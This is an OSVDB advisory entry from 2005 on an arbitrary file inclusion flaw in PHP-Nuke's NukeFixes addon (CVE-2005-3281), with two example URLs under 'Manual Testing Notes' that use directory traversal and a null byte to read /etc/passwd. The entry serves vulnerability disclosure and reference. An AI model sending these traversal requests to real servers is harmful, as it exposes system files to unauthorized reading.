PHP-Nuke NukeFixes Addon modules.php file Variable Arbitrary File Inclusion

2005-10-19T04:48:35
ID OSVDB:20120
Type osvdb
Reporter OSVDB
Modified 2005-10-19T04:48:35

Description

Technical Description

This vulnerability is only present when the magic_quotes_gpc PHP option is 'off'.

Manual Testing Notes

http://[target]/[nuke_dir]/modules.php?name=Search&file=../../../../../../../../../etc/passwd%00

http://[target]/[nuke_dir]/modules.php?name=Search&file=../Forums/viewtopic&phpEx=../../../../../../etc/passwd

References:

Security Tracker: 1015080 Secunia Advisory ID:17218 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-10/0223.html CVE-2005-3281